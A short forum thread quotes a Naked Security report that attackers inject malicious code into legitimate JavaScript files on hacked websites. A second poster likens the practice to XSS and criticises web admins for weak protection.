Malware injected into legitimate JavaScript code on legitimate websites

[JMH]

As recently mentioned in the Sophos Security Threat Report, 80% of the websites where we detect malicious content are innocent sites that have been hacked.

A trend that we have observed is that hackers will insert their malicious code into legitimate JavaScript (not to be mixed up with Java!) hosted on the website.

The JavaScript is automatically loaded by the HTML webpages and inherits the reputation of the main site and the legitimate JavaScript.

Malware injected into legitimate JavaScript code on legitimate websites | Naked Security

 

[AceInfinity]

Sounds a lot like XSS to me, which is nothing super new, yet I still see the mistake by lots of web admins for not protecting against something so simple.